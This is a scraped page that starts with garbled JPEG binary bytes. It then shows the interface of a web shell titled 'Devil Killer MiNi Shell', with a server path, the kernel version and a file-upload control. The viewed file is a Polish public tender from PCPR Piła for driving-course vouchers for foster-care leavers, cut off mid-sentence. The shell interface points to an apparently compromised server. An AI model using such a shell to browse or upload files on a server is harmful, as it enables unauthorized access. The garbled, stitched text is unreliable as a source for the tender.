JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250214/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250214/0010533301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wsparcie w procesie usamodzielnienia wychowanków pieczy zastępczej - działania wzmacniające kompetencje społeczne - vouchery </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie w Pile</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PCPR Piła</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570798410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piła</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-920</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">673491208</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">673491207</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pcpr.pila.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pcpr.pila.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wsparcie w procesie usamodzielnienia wychowanków pieczy zastępczej - działania wzmacniające kompetencje społeczne - vouchery </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee85c47c-2fa0-4168-bc5f-135d04976cc5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00105333</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00045514/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wsparcie w procesie usamodzielnienia wychowanków pieczy zastępczej-działania wzmacniające kompetencje społeczne - vouchery</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Wsparcie deinstytucjonalizacji pieczy zastępczej w podregionie pilskim. Europejski Fundusz Społeczny Plus </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ee85c47c-2fa0-4168-bc5f-135d04976cc5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie się komunikował z Wykonawcami poprzez stronę internetową https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce &#34;Centrum Pomocy&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanym dalej „RODO” Zamawiający informuje, że:<br/>• Administratorem Pani/Pana danych jest Powiatowe Centrum Pomocy Rodzinie z siedzibą w Pile przy al. Niepodległości 37, 64-920<br/>Piła;<br/>• Administrator Danych wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować poprzez e-mail: rodo@pcpr.pila.pl, pisemnie na adres siedziby Administratora oraz telefonicznie: 67 349 12 08;<br/>• Pani/Pana dane osobowe przetwarzane będą w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, zwanej dalej „ustawą Pzp”, a następnie dla wypełnienia obowiązku archiwizacji dokumentów, w związku z art. 6 ust. 1<br/>lit. c RODO;<br/>• Pani/Pana dane osobowe mogą być przekazywane innym odbiorcom na podstawie przepisów prawa lub zawartych umów w oparciu o art. 74 ustawy Pzp;<br/>• Pani/Pana dane będą przechowywane przez okres niezbędny do realizacji celu, w którym zostały zebrane, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy o archiwizacji;<br/>• podanie przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, a konsekwencje ich niepodania wynikają z ustawy Pzp;<br/>• Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane;<br/>• przysługuje Pani/Panu:<br/>- prawo dostępu do swoich danych oraz otrzymania ich kopii,<br/>- prawo do sprostowania swoich danych,<br/>- prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa,<br/>- prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych.<br/>• nie przysługuje Pani/Panu:<br/>- w związku z art.17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o których mowa w art.. 20 RODO;<br/>- na podstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawa prawną przetwarzania<br/>danych jest art.6 ust.1. lit.c RODO.<br/>• Wystąpienie z żądaniem, o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>• W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o<br/>których mowa w art.15 ust.1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać<br/>od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PCPR.XII.325-4/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest są vouchery – kurs prawa jazdy kat. B (na rok 2025) – Usługa wsparcia w procesie usamodzielnienia wychowanków pieczy zastępczej – działania wzmacniające kompetencje społeczne w ramach projektu pn. Wsparcie deinstytucjonalizacji pieczy zastępczej w podregionie pilskim.<br/>a) W roku 2025 - kurs prawa jazdy kat. B dla 5 uczestników przy czym Zamawiający zleci Wykonawcy realizację nie mniej niż + - 1 osoba.<br/>W uzasadnionych przypadkach Zamawiający zastrzega sobie możliwość zmniejszenia ilości zleconych kursów prawa jazdykat. B w danym roku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80411000-8 - Usługi szkół jazdy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">80411200-0 - Usługi szkół nauki jazdy</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-01-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru oferty Zamawiający stosować będzie następujące kryteria:<br/>a)	Cena (C) – 100%<br/>2.	Kryterium Cena (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie całości przedmiotu zamówienia, podanej przez Wykonawcę w ofercie. Wykonawca poda w szczegółowym formularzu oferty kwotę za wykonanie całości zadania oraz koszt za 1 kurs prawa jazdy kat. B.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/>C = (Cmin / Cbadanej) x 100 <br/>gdzie:	<br/>Cmin - cena oferty najtańszej<br/>Cbadanej – cena oferty badanej<br/>3.	Maksymalna ilość punktów, jaką Wykonawca może uzyskać w wyniku oceny według w/w kryteriów wynosi 100 pkt.<br/>4.	Oferty oceniane będą na podstawie ceny brutto za usługę w określonej części, podanej przez Wykonawcę na formularzu ofertowym, stanowiącym załącznik nr 5 do niniejszej SWZ.<br/>5.	Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę w zamówieniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest są vouchery – kurs prawa jazdy kat. B (na rok 2025) – Usługa wsparcia w procesie<br/>usamodzielnienia wychowanków pieczy zastępczej – działania wzmacniające kompetencje społeczne w ramach projektu pn. Wsparcie deinstytucjonalizacji pieczy zastępczej w podregionie pilskim.<br/>W ramach zamówienia Wykonawca będzie świadczył maksymalnie:<br/>a) W roku 2025 - kurs prawa jazdy kat. B dla 5 uczestników<br/>przy czym Zamawiający zleci Wykonawcy realizację nie mniej niż + - 1 osoba.<br/>W uzasadnionych przypadkach Zamawiający zastrzega sobie możliwość zmniejszenia ilości zleconych kursów prawa jazdy<br/>kat. B w danym roku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80411000-8 - Usługi szkół jazdy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <p class="mb-0">80411200-0 - Usługi szkół nauki jazdy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru oferty Zamawiający stosować będzie następujące kryteria:<br/>a)	Cena (C) – 100%<br/>2.	Kryterium Cena (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie całości przedmiotu zamówienia, podanej przez Wykonawcę w ofercie. Wykonawca poda w szczegółowym formularzu oferty kwotę za wykonanie całości zadania oraz koszt za 1 kurs prawa jazdy kat. B.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/>C = (Cmin / Cbadanej) x 100 <br/>gdzie:	<br/>Cmin - cena oferty najtańszej<br/>Cbadanej – cena oferty badanej<br/>3.	Maksymalna ilość punktów, jaką Wykonawca może uzyskać w wyniku oceny według w/w kryteriów wynosi 100 pkt.<br/>4.	Oferty oceniane będą na podstawie ceny brutto za usługę w określonej części, podanej przez Wykonawcę na formularzu ofertowym, stanowiącym załącznik nr 5 do niniejszej SWZ.<br/>5.	Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę w zamówieniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Przedmiotem zamówienia jest świadczenie usługi wsparcia w procesie usamodzielniania wychowanków pieczy zastępczej – działania wzmacniające kompetencje społeczne – vouchery – kurs prawa jazdy kat. B w ramach projektu pn. „Wsparcie deinstytucjonalizacji pieczy zastępczej w podregionie pilskim”, realizowanym w ramach programu Fundusze Europejskie dla<br/>Wielkopolski 2021 – 2027, Priorytet 6: Fundusze europejskie dla Wielkopolski o silniejszym wymiarze społecznym (EFS+),<br/>współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus (EFS+), wniosek nr FEWP.06.15-IŻ.00-0004/23.<br/>Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów prawa jazdy kategorii B dla wychowanków rodzinnej i instytucjonalnej pieczy zastępczej w 2025 roku w ramach realizacji projektu pt. „Wsparcie deinstytucjonalizacji pieczy zastępczej w podregionie pilskim”. Celem kursu jest zdobycie przez uczestników wiedzy teoretycznej i umiejętności<br/>praktycznych w bezpiecznym kierowaniu pojazdem dla prawa jazdy kat. B.<br/>Organizacja i przeprowadzenie kursu na prawo jazdy kategorii B w 2025 roku dla 5 osób (Cześć I) oraz 5 osób (Część II) – podopiecznych pieczy zastępczej (część teoretyczną kursu w zakresie przepisów ruchu drogowego i zasady pomocy przedlekarskiej realizowane w wymiarze min. 30 godzin dydaktycznych (jedna godzina dydaktyczna stanowi 45 minut) oraz<br/>część praktyczną kursu – w celu przygotowania do egzaminu wewnętrznego i państwowego min. 30 godzin zegarowych (60 minut) na osobę, w oparciu o rozporządzenie Ministra Infrastruktury i Budownictwa z dnia 4 marca 2016 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. z 2018 r. poz.<br/>1885) oraz zgodnie z przepisami Prawo o ruchu drogowym (Dz. U. z 2024 poz. 1251).<br/>Podstawą przyjęcia osób na kurs prawa jazdy kat. B będzie imienne skierowanie na kurs prawa jazdy kat. B przekazane przez Powiatowe Centrum Pomocy Rodzinie w Pile.<br/>Do podstawowych obowiązków Wykonawcy związane z realizacją zamówienia będzie:<br/>a) prowadzenie list obecności wraz z podpisami uczestników kursu;<br/>b) zapewnienie wszelkich niezbędnych materiałów szkoleniowych – również w formie elektronicznej (na własność<br/>kursantów);<br/>c) prowadzenie dokumentu potwierdzającego odebranie materiałów szkoleniowych przez uczestników kursu;<br/>d) przedłożenie harmonogramu kursu Zamawiającemu przed jego rozpoczęciem w celu akceptacji;<br/>e) przekazywanie bieżących informacji Zamawiającemu o przypadkach nieobecności na kursie danej osoby oraz o<br/>rezygnacji z uczestnictwa w trakcie jego trwania pod rygorem odmowy zapłaty za szkolenie lub jego części dot. tych osób;<br/>f) przygotowanie protokołu z przeprowadzonego egzaminu wewnętrznego dla części teoretycznej i praktycznej;<br/>g) poinformowanie uczestników kursu na pierwszym spotkaniu o współfinansowaniu projektu ze środków Unii Europejskiej w<br/>ramach Europejskiego Funduszu Społecznego oraz realizacji obowiązku informacyjnego i promocyjnego poprzez oznakowanie miejsca prowadzenia kursu i prowadzonej dokumentacji logotypami unijnymi dotyczącymi programu (wzory Wykonawca otrzyma od Zamawiającego do 10 dni po podpisaniu umowy);<br/>h) Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników podczas realizacji kursu, zapewnia warunki kursu zgodnie z przepisami bezpieczeństwa i higieny pracy;<br/>i) Wykonawca dysponuje instruktorami nauki jazdy dla kategorii B, posiadającymi kwalifikacje odpowiednie do tematyki<br/>kursu oraz co najmniej 1 placem manewrowym, a także dysponuje pojazdami do nauki jazdy dla kategorii B;<br/>j) Wykonawca w oferowanej cenie uwzględnia wszelkie koszty niezbędne do realizacji przedmiotowego zamówienia, podając cenę jednostkową za kurs (bez badań lekarskich oraz za egzamin państwowy, którego koszty ponoszą we własnym zakresie uczestnicy kursu).<br/>k) Wykonawca przyjmuje do wiadomości i bez zastrzeżeń, że Zamawiający zapłaci Wykonawcy za danego uczestnika kursu pod warunkiem ukończenia przez niego kursu prawa jazdy kat. B.<br/>Wykonawca w cenie oferty zawiera:<br/>a) koszt wszelkich niezbędnych materiałów szkoleniowych – również w formie elektronicznej (na własność kursantów);<br/>b) część teoretyczną kursu w zakresie przepisów ruchu drogowego i zasady pomocy przedlekarskiej realizowane w<br/>wymiarze min. 30 godzin dydaktycznych (jedna godzina dydaktyczna stanowi 45 minut);<br/>c) część praktyczną kursu – w celu przygotowania do egzaminu wewnętrznego i państwowego min. 30 godzin zegarowych (60 minut) na osobę;<br/>d) przeprowadzenie przed egzaminem zewnętrznym – państwowym (częścią teoretyczną i praktyczną) egzaminu wewnętrznego z części teoretycznej i praktycznej dla prawa jazdy kat. B dla każdego uczestnika kursu, Wykonawca<br/>sporządza protokół z przeprowadzonego egzaminu zawierający wynik egzaminu wewnętrznego;<br/>e) zgłoszenie na egzamin państwowy na prawo jazdy w Wojewódzkim Ośrodku Ruchu Drogowego dla każdego uczestnika kursu.<br/>Wykonawca przekaże Zamawiającemu wstępne terminy dla przeprowadzania kursu dla Uczestników. Po stronie Zamawiającego jest kontaktowanie się z Uczestnikami w celu omówienia się na termin rozpoczęcia kursu. Wykonawca zobowiązany jest do prowadzenia listy obecności dla każdego uczestnika projektu wg wzoru dostarczonego przez<br/>Zamawiającego.<br/>Ilość: dla 5 podopiecznych pieczy zastępczej (Część I) oraz dla 5 podopiecznych pieczy zastępczej (Część II). Zamawiający zastrzega sobie możliwość zmiany liczby osób.<br/>MIEJSCE WYKONYWANIA PRZEDMIOTU ZAMÓWIENIA – Zajęcia teoretyczne – teren powiatu 